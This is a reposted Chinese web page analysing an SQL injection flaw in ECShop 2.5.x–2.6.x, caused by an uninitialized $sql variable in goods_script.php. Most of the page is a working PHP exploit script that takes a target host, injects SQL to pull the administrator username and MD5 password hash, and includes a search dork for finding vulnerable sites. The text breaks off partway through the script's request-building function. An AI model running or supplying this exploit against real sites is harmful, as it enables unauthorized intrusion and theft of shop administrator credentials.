欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

ECShop 注射漏洞分析

程序员文章站 2022-06-22 19:56:16
影响2.5.x和2.6.x,其他版本未测试 goods_script.php 44行: [code] if (empty($_GET['type'])) { ... } elseif ($_GET['type'] == 'collection') { ... } $sql .= " ... 09-04-18...
影响2.5.x和2.6.x,其他版本未测试
goods_script.php
44行:

复制代码
代码如下:

if (empty($_get['type']))
{
...
}
elseif ($_get['type'] == 'collection')
{
...
}
$sql .= " limit " . (!empty($_get['goods_num']) ? intval($_get['goods_num']) : 10);
$res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)
exp:

复制代码
代码如下:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
ecshop <= v2.6.2 sql injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "powered by ecshop"
+---------------------------------------------------------------------------+
');
/**
* works with register_globals = on
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$resp = send();
preg_match('#href="([\s]+):([a-z0-9]{32})"#', $resp, $hash);
if ($hash)
exit("expoilt success!\nadmin:\t$hash[1]\npassword(md5):\t$hash[2]\n");
else
exit("exploit failed!\n");
function send()
{
global $host, $path;
$cmd = 'sql=select concat(user_name,0x3a,password) as goods_id from ecs_admin_user where action_list=0x'.bin2hex('all').' limit 1#';
$data = "post ".$path."goods_script.php?type=".time()." http/1.1\r\n";
$data .= "accept: */*\r\n";
$data .= "accept-language: zh-cn\r\n";
$data .= "content-type: application/x-www-form-urlencoded\r\n";
$data .= "user-agent: mozilla/4.0 (compatible; msie 6.00; windows nt 5.1; sv1)\r\n";
$data .= "host: $host\r\n";
$data .= "content-length: ".strlen($cmd)."\r\n";
$data .= "connection: close\r\n\r\n";
$data .= $cmd;